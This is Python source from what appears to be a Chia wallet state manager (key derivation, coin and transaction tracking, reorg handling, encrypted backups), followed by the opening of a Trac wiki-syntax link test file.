to_generate = self.config["initial_num_public_keys"]
for wallet_id in targets:
target_wallet = self.wallets[wallet_id]
last: Optional[uint32] = await self.puzzle_store.get_last_derivation_path_for_wallet(wallet_id)
start_index = 0
derivation_paths: List[DerivationRecord] = []
if last is not None:
start_index = last + 1
# If the key was replaced (from_zero=True), we should generate the puzzle hashes for the new key
if from_zero:
start_index = 0
for index in range(start_index, unused + to_generate):
if WalletType(target_wallet.type()) == WalletType.POOLING_WALLET:
continue
if WalletType(target_wallet.type()) == WalletType.RATE_LIMITED:
if target_wallet.rl_info.initialized is False:
break
wallet_type = target_wallet.rl_info.type
if wallet_type == "user":
rl_pubkey = G1Element.from_bytes(target_wallet.rl_info.user_pubkey)
else:
rl_pubkey = G1Element.from_bytes(target_wallet.rl_info.admin_pubkey)
rl_puzzle: Program = target_wallet.puzzle_for_pk(rl_pubkey)
puzzle_hash: bytes32 = rl_puzzle.get_tree_hash()
rl_index = self.get_derivation_index(rl_pubkey)
if rl_index == -1:
break
derivation_paths.append(
DerivationRecord(
uint32(rl_index),
puzzle_hash,
rl_pubkey,
target_wallet.type(),
uint32(target_wallet.id()),
)
)
break
pubkey: G1Element = self.get_public_key(uint32(index))
puzzle: Program = target_wallet.puzzle_for_pk(bytes(pubkey))
if puzzle is None:
self.log.warning(f"Unable to create puzzles with wallet {target_wallet}")
break
puzzlehash: bytes32 = puzzle.get_tree_hash()
self.log.info(f"Puzzle at index {index} wallet ID {wallet_id} puzzle hash {puzzlehash.hex()}")
derivation_paths.append(
DerivationRecord(
uint32(index),
puzzlehash,
pubkey,
target_wallet.type(),
uint32(target_wallet.id()),
)
)
await self.puzzle_store.add_derivation_paths(derivation_paths, in_transaction)
if unused > 0:
await self.puzzle_store.set_used_up_to(uint32(unused - 1), in_transaction)
async def update_wallet_puzzle_hashes(self, wallet_id):
derivation_paths: List[DerivationRecord] = []
target_wallet = self.wallets[wallet_id]
last: Optional[uint32] = await self.puzzle_store.get_last_derivation_path_for_wallet(wallet_id)
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
# This handles the case where the database has entries but they have all been used
unused = await self.puzzle_store.get_last_derivation_path()
if unused is None:
# This handles the case where the database is empty
unused = uint32(0)
for index in range(unused, last):
pubkey: G1Element = self.get_public_key(uint32(index))
puzzle: Program = target_wallet.puzzle_for_pk(bytes(pubkey))
puzzlehash: bytes32 = puzzle.get_tree_hash()
self.log.info(f"Generating public key at index {index} puzzle hash {puzzlehash.hex()}")
derivation_paths.append(
DerivationRecord(
uint32(index),
puzzlehash,
pubkey,
target_wallet.wallet_info.type,
uint32(target_wallet.wallet_info.id),
)
)
await self.puzzle_store.add_derivation_paths(derivation_paths)
async def get_unused_derivation_record(self, wallet_id: uint32, in_transaction=False) -> DerivationRecord:
"""
Creates a puzzle hash for the given wallet, and then makes more puzzle hashes
for every wallet to ensure we always have more in the database. Never reusue the
same public key more than once (for privacy).
"""
async with self.puzzle_store.lock:
# If we have no unused public keys, we will create new ones
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
await self.create_more_puzzle_hashes()
# Now we must have unused public keys
unused = await self.puzzle_store.get_unused_derivation_path()
assert unused is not None
record: Optional[DerivationRecord] = await self.puzzle_store.get_derivation_record(unused, wallet_id)
assert record is not None
# Set this key to used so we never use it again
await self.puzzle_store.set_used_up_to(record.index, in_transaction=in_transaction)
# Create more puzzle hashes / keys
await self.create_more_puzzle_hashes(in_transaction=in_transaction)
return record
async def get_current_derivation_record_for_wallet(self, wallet_id: uint32) -> Optional[DerivationRecord]:
async with self.puzzle_store.lock:
# If we have no unused public keys, we will create new ones
current: Optional[DerivationRecord] = await self.puzzle_store.get_current_derivation_record_for_wallet(
wallet_id
)
return current
def set_callback(self, callback: Callable):
"""
Callback to be called when the state of the wallet changes.
"""
self.state_changed_callback = callback
def set_pending_callback(self, callback: Callable):
"""
Callback to be called when new pending transaction enters the store
"""
self.pending_tx_callback = callback
def set_coin_with_puzzlehash_created_callback(self, puzzlehash: bytes32, callback: Callable):
"""
Callback to be called when new coin is seen with specified puzzlehash
"""
self.puzzle_hash_created_callbacks[puzzlehash] = callback
def set_new_peak_callback(self, wallet_id: int, callback: Callable):
"""
Callback to be called when blockchain adds new peak
"""
self.new_peak_callbacks[wallet_id] = callback
async def puzzle_hash_created(self, coin: Coin):
callback = self.puzzle_hash_created_callbacks[coin.puzzle_hash]
if callback is None:
return None
await callback(coin)
def state_changed(self, state: str, wallet_id: int = None, data_object=None):
"""
Calls the callback if it's present.
"""
if data_object is None:
data_object = {}
if self.state_changed_callback is None:
return None
self.state_changed_callback(state, wallet_id, data_object)
def tx_pending_changed(self) -> None:
"""
Notifies the wallet node that there's new tx pending
"""
if self.pending_tx_callback is None:
return None
self.pending_tx_callback()
async def synced(self):
if self.sync_mode is True:
return False
peak: Optional[BlockRecord] = self.blockchain.get_peak()
if peak is None:
return False
curr = peak
while not curr.is_transaction_block and not curr.height == 0:
curr = self.blockchain.try_block_record(curr.prev_hash)
if curr is None:
return False
if curr.is_transaction_block and curr.timestamp > int(time.time()) - 7 * 60:
return True
return False
def set_sync_mode(self, mode: bool):
"""
Sets the sync mode. This changes the behavior of the wallet node.
"""
self.sync_mode = mode
self.state_changed("sync_changed")
async def get_confirmed_spendable_balance_for_wallet(self, wallet_id: int, unspent_records=None) -> uint128:
"""
Returns the balance amount of all coins that are spendable.
"""
spendable: Set[WalletCoinRecord] = await self.get_spendable_coins_for_wallet(wallet_id, unspent_records)
spendable_amount: uint128 = uint128(0)
for record in spendable:
spendable_amount = uint128(spendable_amount + record.coin.amount)
return spendable_amount
async def does_coin_belong_to_wallet(self, coin: Coin, wallet_id: int) -> bool:
"""
Returns true if we have the key for this coin.
"""
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is None:
return False
coin_wallet_id, wallet_type = info
if wallet_id == coin_wallet_id:
return True
return False
async def get_confirmed_balance_for_wallet_already_locked(self, wallet_id: int) -> uint128:
# This is a workaround to be able to call la locking operation when already locked
# for example, in the create method of DID wallet
if self.lock.locked() is False:
raise AssertionError("expected wallet_state_manager to be locked")
unspent_coin_records = await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
return get_balance_from_coin_records(unspent_coin_records)
async def get_confirmed_balance_for_wallet(
self,
wallet_id: int,
unspent_coin_records: Optional[Set[WalletCoinRecord]] = None,
) -> uint128:
"""
Returns the confirmed balance, including coinbase rewards that are not spendable.
"""
# lock only if unspent_coin_records is None.
# This API should change so that get_balance_from_coin_records is called for Set[WalletCoinRecord]
# and this method is called only for the unspent_coin_records==None case.
if unspent_coin_records is None:
unspent_coin_records = await self.get_confirmed_balance_for_wallet_with_lock(wallet_id)
return get_balance_from_coin_records(unspent_coin_records)
async def get_confirmed_balance_for_wallet_with_lock(self, wallet_id: int) -> Set[WalletCoinRecord]:
if self.lock.locked() is True:
# raise AssertionError("expected wallet_state_manager to be unlocked")
pass
async with self.lock:
return await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
async def get_unconfirmed_balance(
self, wallet_id, unspent_coin_records: Optional[Set[WalletCoinRecord]] = None
) -> uint128:
"""
Returns the balance, including coinbase rewards that are not spendable, and unconfirmed
transactions.
"""
# This API should change so that get_balance_from_coin_records is called for Set[WalletCoinRecord]
# and this method is called only for the unspent_coin_records==None case.
confirmed_amount = await self.get_confirmed_balance_for_wallet(wallet_id, unspent_coin_records)
return await self._get_unconfirmed_balance(wallet_id, confirmed_amount)
async def get_unconfirmed_balance_already_locked(self, wallet_id) -> uint128:
confirmed_amount = await self.get_confirmed_balance_for_wallet_already_locked(wallet_id)
return await self._get_unconfirmed_balance(wallet_id, confirmed_amount)
async def _get_unconfirmed_balance(self, wallet_id, confirmed: uint128) -> uint128:
unconfirmed_tx: List[TransactionRecord] = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
removal_amount: int = 0
addition_amount: int = 0
for record in unconfirmed_tx:
for removal in record.removals:
if await self.does_coin_belong_to_wallet(removal, wallet_id):
removal_amount += removal.amount
for addition in record.additions:
# This change or a self transaction
if await self.does_coin_belong_to_wallet(addition, wallet_id):
addition_amount += addition.amount
result = (confirmed + addition_amount) - removal_amount
return uint128(result)
async def unconfirmed_additions_for_wallet(self, wallet_id: int) -> Dict[bytes32, Coin]:
"""
Returns change coins for the wallet_id.
(Unconfirmed addition transactions that have not been confirmed yet.)
"""
additions: Dict[bytes32, Coin] = {}
unconfirmed_tx = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
for record in unconfirmed_tx:
for coin in record.additions:
if await self.is_addition_relevant(coin):
additions[coin.name()] = coin
return additions
async def unconfirmed_removals_for_wallet(self, wallet_id: int) -> Dict[bytes32, Coin]:
"""
Returns new removals transactions that have not been confirmed yet.
"""
removals: Dict[bytes32, Coin] = {}
unconfirmed_tx = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
for record in unconfirmed_tx:
for coin in record.removals:
removals[coin.name()] = coin
return removals
async def new_transaction_block_callback(
self,
removals: List[Coin],
additions: List[Coin],
block: BlockRecord,
additional_coin_spends: List[CoinSpend],
):
height: uint32 = block.height
for coin in additions:
await self.puzzle_hash_created(coin)
trade_additions, added = await self.coins_of_interest_added(additions, block)
trade_removals, removed = await self.coins_of_interest_removed(removals, height)
if len(trade_additions) > 0 or len(trade_removals) > 0:
await self.trade_manager.coins_of_interest_farmed(trade_removals, trade_additions, height)
if len(additional_coin_spends) > 0:
created_pool_wallet_ids: List[int] = []
for cs in additional_coin_spends:
if cs.coin.puzzle_hash == SINGLETON_LAUNCHER_HASH:
already_have = False
pool_state = None
for wallet_id, wallet in self.wallets.items():
if (
wallet.type() == WalletType.POOLING_WALLET
and (await wallet.get_current_state()).launcher_id == cs.coin.name()
):
self.log.warning("Already have, not recreating")
already_have = True
if not already_have:
try:
pool_state = solution_to_pool_state(cs)
except Exception as e:
self.log.debug(f"Not a pool wallet launcher {e}")
continue
if pool_state is None:
self.log.debug("Not a pool wallet launcher")
continue
self.log.info("Found created launcher. Creating pool wallet")
pool_wallet = await PoolWallet.create(
self, self.main_wallet, cs.coin.name(), additional_coin_spends, height, True, "pool_wallet"
)
created_pool_wallet_ids.append(pool_wallet.wallet_id)
for wallet_id, wallet in self.wallets.items():
if wallet.type() == WalletType.POOLING_WALLET:
await wallet.apply_state_transitions(additional_coin_spends, height)
added_notified = set()
removed_notified = set()
for coin_record in added:
if coin_record.wallet_id in added_notified:
continue
added_notified.add(coin_record.wallet_id)
self.state_changed("coin_added", coin_record.wallet_id)
for coin_record in removed:
if coin_record.wallet_id in removed_notified:
continue
removed_notified.add(coin_record.wallet_id)
self.state_changed("coin_removed", coin_record.wallet_id)
self.tx_pending_changed()
async def coins_of_interest_added(
self, coins: List[Coin], block: BlockRecord
) -> Tuple[List[Coin], List[WalletCoinRecord]]:
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
trade_adds: List[Coin] = []
height = block.height
pool_rewards = set()
farmer_rewards = set()
added = []
prev = await self.blockchain.get_block_record_from_db(block.prev_hash)
# [block 1] [block 2] [tx block 3] [block 4] [block 5] [tx block 6]
# [tx block 6] will contain rewards for [block 1] [block 2] [tx block 3]
while prev is not None:
# step 1 find previous block
if prev.is_transaction_block:
break
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
if prev is not None:
# include last block
pool_parent = pool_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
farmer_parent = farmer_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
pool_rewards.add(pool_parent)
farmer_rewards.add(farmer_parent)
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
while prev is not None:
# step 2 traverse from previous block to the block before it
pool_parent = pool_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
farmer_parent = farmer_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
pool_rewards.add(pool_parent)
farmer_rewards.add(farmer_parent)
if prev.is_transaction_block:
break
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
wallet_ids: Set[int] = set()
for coin in coins:
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is not None:
wallet_ids.add(info[0])
all_outgoing_tx: Dict[int, List[TransactionRecord]] = {}
for wallet_id in wallet_ids:
all_outgoing_tx[wallet_id] = await self.tx_store.get_all_transactions_for_wallet(
wallet_id, TransactionType.OUTGOING_TX
)
for coin in coins:
if coin.name() in trade_additions:
trade_adds.append(coin)
is_coinbase = False
is_fee_reward = False
if coin.parent_coin_info in pool_rewards:
is_coinbase = True
if coin.parent_coin_info in farmer_rewards:
is_fee_reward = True
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is not None:
wallet_id, wallet_type = info
added_coin_record = await self.coin_added(
coin,
is_coinbase,
is_fee_reward,
uint32(wallet_id),
wallet_type,
height,
all_outgoing_tx.get(wallet_id, []),
)
added.append(added_coin_record)
else:
interested_wallet_id = await self.interested_store.get_interested_puzzle_hash_wallet_id(
puzzle_hash=coin.puzzle_hash
)
if interested_wallet_id is not None:
wallet_type = self.wallets[uint32(interested_wallet_id)].type()
added_coin_record = await self.coin_added(
coin,
is_coinbase,
is_fee_reward,
uint32(interested_wallet_id),
wallet_type,
height,
all_outgoing_tx.get(interested_wallet_id, []),
)
added.append(added_coin_record)
derivation_index = await self.puzzle_store.index_for_puzzle_hash(coin.puzzle_hash)
if derivation_index is not None:
await self.puzzle_store.set_used_up_to(derivation_index, True)
return trade_adds, added
async def coins_of_interest_removed(
self, coins: List[Coin], height: uint32
) -> Tuple[List[Coin], List[WalletCoinRecord]]:
# This gets called when coins of our interest are spent on chain
if len(coins) > 0:
self.log.info(f"Coins removed {coins} at height: {height}")
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
# Keep track of trade coins that are removed
trade_coin_removed: List[Coin] = []
removed = []
all_unconfirmed: List[TransactionRecord] = await self.tx_store.get_all_unconfirmed()
for coin in coins:
record = await self.coin_store.get_coin_record(coin.name())
if coin.name() in trade_removals:
trade_coin_removed.append(coin)
if record is None:
self.log.info(f"Record for removed coin {coin.name()} is None. (ephemeral)")
else:
await self.coin_store.set_spent(coin.name(), height)
for unconfirmed_record in all_unconfirmed:
for rem_coin in unconfirmed_record.removals:
if rem_coin.name() == coin.name():
self.log.info(f"Setting tx_id: {unconfirmed_record.name} to confirmed")
await self.tx_store.set_confirmed(unconfirmed_record.name, height)
if record is not None:
removed.append(record)
return trade_coin_removed, removed
async def coin_added(
self,
coin: Coin,
coinbase: bool,
fee_reward: bool,
wallet_id: uint32,
wallet_type: WalletType,
height: uint32,
all_outgoing_transaction_records: List[TransactionRecord],
) -> WalletCoinRecord:
"""
Adding coin to DB
"""
self.log.info(f"Adding coin: {coin} at {height}")
farm_reward = False
if coinbase or fee_reward:
farm_reward = True
now = uint64(int(time.time()))
if coinbase:
tx_type: int = TransactionType.COINBASE_REWARD.value
else:
tx_type = TransactionType.FEE_REWARD.value
tx_record = TransactionRecord(
confirmed_at_height=uint32(height),
created_at_time=now,
to_puzzle_hash=coin.puzzle_hash,
amount=coin.amount,
fee_amount=uint64(0),
confirmed=True,
sent=uint32(0),
spend_bundle=None,
additions=[coin],
removals=[],
wallet_id=wallet_id,
sent_to=[],
trade_id=None,
type=uint32(tx_type),
name=coin.name(),
)
await self.tx_store.add_transaction_record(tx_record, True)
else:
records: List[TransactionRecord] = []
for record in all_outgoing_transaction_records:
for add_coin in record.additions:
if add_coin.name() == coin.name():
records.append(record)
if len(records) > 0:
# This is the change from this transaction
for record in records:
if record.confirmed is False:
await self.tx_store.set_confirmed(record.name, height)
else:
now = uint64(int(time.time()))
tx_record = TransactionRecord(
confirmed_at_height=uint32(height),
created_at_time=now,
to_puzzle_hash=coin.puzzle_hash,
amount=coin.amount,
fee_amount=uint64(0),
confirmed=True,
sent=uint32(0),
spend_bundle=None,
additions=[coin],
removals=[],
wallet_id=wallet_id,
sent_to=[],
trade_id=None,
type=uint32(TransactionType.INCOMING_TX.value),
name=coin.name(),
)
if coin.amount > 0:
await self.tx_store.add_transaction_record(tx_record, True)
coin_record: WalletCoinRecord = WalletCoinRecord(
coin, height, uint32(0), False, farm_reward, wallet_type, wallet_id
)
await self.coin_store.add_coin_record(coin_record)
if wallet_type == WalletType.COLOURED_COIN or wallet_type == WalletType.DISTRIBUTED_ID:
wallet = self.wallets[wallet_id]
await wallet.coin_added(coin, height)
return coin_record
async def add_pending_transaction(self, tx_record: TransactionRecord):
"""
Called from wallet before new transaction is sent to the full_node
"""
# Wallet node will use this queue to retry sending this transaction until full nodes receives it
await self.tx_store.add_transaction_record(tx_record, False)
self.tx_pending_changed()
self.state_changed("pending_transaction", tx_record.wallet_id)
async def add_transaction(self, tx_record: TransactionRecord):
"""
Called from wallet to add transaction that is not being set to full_node
"""
await self.tx_store.add_transaction_record(tx_record, False)
self.state_changed("pending_transaction", tx_record.wallet_id)
async def remove_from_queue(
self,
spendbundle_id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
error: Optional[Err],
):
"""
Full node received our transaction, no need to keep it in queue anymore
"""
updated = await self.tx_store.increment_sent(spendbundle_id, name, send_status, error)
if updated:
tx: Optional[TransactionRecord] = await self.get_transaction(spendbundle_id)
if tx is not None:
self.state_changed("tx_update", tx.wallet_id, {"transaction": tx})
async def get_all_transactions(self, wallet_id: int) -> List[TransactionRecord]:
"""
Retrieves all confirmed and pending transactions
"""
records = await self.tx_store.get_all_transactions_for_wallet(wallet_id)
return records
async def get_transaction(self, tx_id: bytes32) -> Optional[TransactionRecord]:
return await self.tx_store.get_transaction_record(tx_id)
async def get_filter_additions_removals(
self, new_block: HeaderBlock, transactions_filter: bytes, fork_point_with_peak: Optional[uint32]
) -> Tuple[List[bytes32], List[bytes32]]:
"""Returns a list of our coin ids, and a list of puzzle_hashes that positively match with provided filter."""
# assert new_block.prev_header_hash in self.blockchain.blocks
tx_filter = PyBIP158([b for b in transactions_filter])
# Find fork point
if fork_point_with_peak is not None:
fork_h: int = fork_point_with_peak
elif new_block.prev_header_hash != self.constants.GENESIS_CHALLENGE and self.peak is not None:
block_record = await self.blockchain.get_block_record_from_db(self.peak.header_hash)
# this may return -1, in case there is no shared ancestor block
fork_h = find_fork_point_in_chain(
self.blockchain,
block_record,
new_block,
)
else:
fork_h = 0
# Get all unspent coins
my_coin_records: Set[WalletCoinRecord] = await self.coin_store.get_unspent_coins_at_height(
uint32(fork_h) if fork_h >= 0 else None
)
# Filter coins up to and including fork point
unspent_coin_names: Set[bytes32] = set()
for coin in my_coin_records:
if coin.confirmed_block_height <= fork_h:
unspent_coin_names.add(coin.name())
# Get all blocks after fork point up to but not including this block
if new_block.height > 0:
curr: BlockRecord = self.blockchain.block_record(new_block.prev_hash)
reorg_blocks: List[HeaderBlockRecord] = []
while curr.height > fork_h:
header_block_record = await self.block_store.get_header_block_record(curr.header_hash)
assert header_block_record is not None
reorg_blocks.append(header_block_record)
if curr.height == 0:
break
curr = await self.blockchain.get_block_record_from_db(curr.prev_hash)
reorg_blocks.reverse()
# For each block, process additions to get all Coins, then process removals to get unspent coins
for reorg_block in reorg_blocks:
for addition in reorg_block.additions:
unspent_coin_names.add(addition.name())
for removal in reorg_block.removals:
record = await self.puzzle_store.get_derivation_record_for_puzzle_hash(removal.puzzle_hash)
if record is None:
continue
unspent_coin_names.remove(removal.name())
my_puzzle_hashes = self.puzzle_store.all_puzzle_hashes
removals_of_interest: bytes32 = []
additions_of_interest: bytes32 = []
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
for name, trade_coin in trade_removals.items():
if tx_filter.Match(bytearray(trade_coin.name())):
removals_of_interest.append(trade_coin.name())
for name, trade_coin in trade_additions.items():
if tx_filter.Match(bytearray(trade_coin.puzzle_hash)):
additions_of_interest.append(trade_coin.puzzle_hash)
for coin_name in unspent_coin_names:
if tx_filter.Match(bytearray(coin_name)):
removals_of_interest.append(coin_name)
for puzzle_hash in my_puzzle_hashes:
if tx_filter.Match(bytearray(puzzle_hash)):
additions_of_interest.append(puzzle_hash)
for coin_id in await self.interested_store.get_interested_coin_ids():
if tx_filter.Match(bytearray(coin_id)):
removals_of_interest.append(coin_id)
for puzzle_hash, _ in await self.interested_store.get_interested_puzzle_hashes():
if tx_filter.Match(bytearray(puzzle_hash)):
additions_of_interest.append(puzzle_hash)
return additions_of_interest, removals_of_interest
async def is_addition_relevant(self, addition: Coin):
"""
Check whether we care about a new addition (puzzle_hash). Returns true if we
control this puzzle hash.
"""
result = await self.puzzle_store.puzzle_hash_exists(addition.puzzle_hash)
return result
async def get_wallet_for_coin(self, coin_id: bytes32) -> Any:
coin_record = await self.coin_store.get_coin_record(coin_id)
if coin_record is None:
return None
wallet_id = uint32(coin_record.wallet_id)
wallet = self.wallets[wallet_id]
return wallet
async def reorg_rollback(self, height: int):
"""
Rolls back and updates the coin_store and transaction store. It's possible this height
is the tip, or even beyond the tip.
"""
await self.coin_store.rollback_to_block(height)
reorged: List[TransactionRecord] = await self.tx_store.get_transaction_above(height)
await self.tx_store.rollback_to_block(height)
for record in reorged:
if record.type in [
TransactionType.OUTGOING_TX,
TransactionType.OUTGOING_TRADE,
TransactionType.INCOMING_TRADE,
]:
await self.tx_store.tx_reorged(record)
# Removes wallets that were created from a blockchain transaction which got reorged.
remove_ids = []
for wallet_id, wallet in self.wallets.items():
if wallet.type() == WalletType.POOLING_WALLET.value:
remove: bool = await wallet.rewind(height)
if remove:
remove_ids.append(wallet_id)
for wallet_id in remove_ids:
await self.user_store.delete_wallet(wallet_id, in_transaction=True)
self.wallets.pop(wallet_id)
self.new_peak_callbacks.pop(wallet_id)
async def close_all_stores(self) -> None:
if self.blockchain is not None:
self.blockchain.shut_down()
await self.db_connection.close()
async def clear_all_stores(self):
await self.coin_store._clear_database()
await self.tx_store._clear_database()
await self.puzzle_store._clear_database()
await self.user_store._clear_database()
await self.basic_store._clear_database()
def unlink_db(self):
Path(self.db_path).unlink()
async def get_all_wallet_info_entries(self) -> List[WalletInfo]:
return await self.user_store.get_all_wallet_info_entries()
async def get_start_height(self):
"""
If we have coin use that as starting height next time,
otherwise use the peak
"""
first_coin_height = await self.coin_store.get_first_coin_height()
if first_coin_height is None:
start_height = self.blockchain.get_peak()
else:
start_height = first_coin_height
return start_height
async def create_wallet_backup(self, file_path: Path):
all_wallets = await self.get_all_wallet_info_entries()
for wallet in all_wallets:
if wallet.id == 1:
all_wallets.remove(wallet)
break
backup_pk = master_sk_to_backup_sk(self.private_key)
now = uint64(int(time.time()))
wallet_backup = WalletInfoBackup(all_wallets)
backup: Dict[str, Any] = {}
data = wallet_backup.to_json_dict()
data["version"] = __version__
data["fingerprint"] = self.private_key.get_g1().get_fingerprint()
data["timestamp"] = now
data["start_height"] = await self.get_start_height()
key_base_64 = base64.b64encode(bytes(backup_pk))
f = Fernet(key_base_64)
data_bytes = json.dumps(data).encode()
encrypted = f.encrypt(data_bytes)
meta_data: Dict[str, Any] = {"timestamp": now, "pubkey": bytes(backup_pk.get_g1()).hex()}
meta_data_bytes = json.dumps(meta_data).encode()
signature = bytes(AugSchemeMPL.sign(backup_pk, std_hash(encrypted) + std_hash(meta_data_bytes))).hex()
backup["data"] = encrypted.decode()
backup["meta_data"] = meta_data
backup["signature"] = signature
backup_file_text = json.dumps(backup)
file_path.write_text(backup_file_text)
async def import_backup_info(self, file_path) -> None:
json_dict = open_backup_file(file_path, self.private_key)
wallet_list_json = json_dict["data"]["wallet_list"]
for wallet_info in wallet_list_json:
await self.user_store.create_wallet(
wallet_info["name"],
wallet_info["type"],
wallet_info["data"],
wallet_info["id"],
)
await self.load_wallets()
await self.user_settings.user_imported_backup()
await self.create_more_puzzle_hashes(from_zero=True)
async def get_wallet_for_colour(self, colour):
for wallet_id in self.wallets:
wallet = self.wallets[wallet_id]
if wallet.type() == WalletType.COLOURED_COIN:
if bytes(wallet.cc_info.my_genesis_checker).hex() == colour:
return wallet
return None
async def add_new_wallet(self, wallet: Any, wallet_id: int, create_puzzle_hashes=True):
self.wallets[uint32(wallet_id)] = wallet
if create_puzzle_hashes:
await self.create_more_puzzle_hashes()
# search through the blockrecords and return the most recent coin to use a given puzzlehash
async def search_blockrecords_for_puzzlehash(self, puzzlehash: bytes32):
header_hash_of_interest = None
highest_block_height = 0
peak: Optional[BlockRecord] = self.blockchain.get_peak()
if peak is None:
return None, None
peak_block: Optional[HeaderBlockRecord] = await self.blockchain.block_store.get_header_block_record(
peak.header_hash
)
while peak_block is not None:
tx_filter = PyBIP158([b for b in peak_block.header.transactions_filter])
if tx_filter.Match(bytearray(puzzlehash)) and peak_block.height > highest_block_height:
header_hash_of_interest = peak_block.header_hash
highest_block_height = peak_block.height
break
else:
peak_block = await self.blockchain.block_store.get_header_block_record(
peak_block.header.prev_header_hash
)
return highest_block_height, header_hash_of_interest
async def get_spendable_coins_for_wallet(self, wallet_id: int, records=None) -> Set[WalletCoinRecord]:
if self.peak is None:
return set()
if records is None:
records = await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
# Coins that are currently part of a transaction
unconfirmed_tx: List[TransactionRecord] = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
removal_dict: Dict[bytes32, Coin] = {}
for tx in unconfirmed_tx:
for coin in tx.removals:
# TODO, "if" might not be necessary once unconfirmed tx doesn't contain coins for other wallets
if await self.does_coin_belong_to_wallet(coin, wallet_id):
removal_dict[coin.name()] = coin
# Coins that are part of the trade
offer_locked_coins: Dict[bytes32, WalletCoinRecord] = await self.trade_manager.get_locked_coins()
filtered = set()
for record in records:
if record.coin.name() in offer_locked_coins:
continue
if record.coin.name() in removal_dict:
continue
filtered.add(record)
return filtered
async def create_action(
self, name: str, wallet_id: int, wallet_type: int, callback: str, done: bool, data: str, in_transaction: bool
):
await self.action_store.create_action(name, wallet_id, wallet_type, callback, done, data, in_transaction)
self.tx_pending_changed()
async def set_action_done(self, action_id: int):
await self.action_store.action_done(action_id)
async def generator_received(self, height: uint32, header_hash: uint32, program: Program):
actions: List[WalletAction] = await self.action_store.get_all_pending_actions()
for action in actions:
data = json.loads(action.data)
action_data = data["data"]["action_data"]
if action.name == "request_generator":
stored_header_hash = bytes32(hexstr_to_bytes(action_data["header_hash"]))
stored_height = uint32(action_data["height"])
if stored_header_hash == header_hash and stored_height == height:
if action.done:
return None
wallet = self.wallets[uint32(action.wallet_id)]
callback_str = action.wallet_callback
if callback_str is not None:
callback = getattr(wallet, callback_str)
await callback(height, header_hash, program, action.id)
async def puzzle_solution_received(self, response: RespondPuzzleSolution):
unwrapped: PuzzleSolutionResponse = response.response
actions: List[WalletAction] = await self.action_store.get_all_pending_actions()
for action in actions:
data = json.loads(action.data)
action_data = data["data"]["action_data"]
if action.name == "request_puzzle_solution":
stored_coin_name = bytes32(hexstr_to_bytes(action_data["coin_name"]))
height = uint32(action_data["height"])
if stored_coin_name == unwrapped.coin_name and height == unwrapped.height:
if action.done:
return None
wallet = self.wallets[uint32(action.wallet_id)]
callback_str = action.wallet_callback
if callback_str is not None:
callback = getattr(wallet, callback_str)
await callback(unwrapped, action.id)
def get_peak(self) -> Optional[BlockRecord]:
return self.blockchain.get_peak()
async def get_next_interesting_coin_ids(self, spend: CoinSpend, in_transaction: bool) -> List[bytes32]:
pool_wallet_interested: List[bytes32] = PoolWallet.get_next_interesting_coin_ids(spend)
for coin_id in pool_wallet_interested:
await self.interested_store.add_interested_coin_id(coin_id, in_transaction)
return pool_wallet_interested
async def new_peak(self):
peak: Optional[BlockRecord] = self.get_peak()
if peak is None:
return
for wallet_id, callback in self.new_peak_callbacks.items():
await callback(peak)
| 42.899921 | 119 | 0.636536 |
a493eeac430bf5d7292a96035c3bdc9679c43550
| 36,327 |
py
|
Python
|
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2020 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at https://trac.edgewall.org/log/.
import unittest
from trac.util.datefmt import datetime_now, utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
TEST_CASES = u"""
============================== wiki: link resolver
wiki:TestPage
wiki:TestPage/
wiki:/TestPage
[wiki:/TestPage]
[wiki:/TestPage ]
[wiki:/TestPage\u200B]
[wiki:/TestPage /TestPage]
wiki:"Space 1 23"
wiki:"C'est l'\xe9t\xe9"
wiki:MissingPage
wiki:12
wiki:abc
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage</a>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage/</a>
<a class="wiki" href="/wiki/TestPage">wiki:/TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">/TestPage</a>
<a class="wiki" href="/wiki/Space%201%2023">wiki:"Space 1 23"</a>
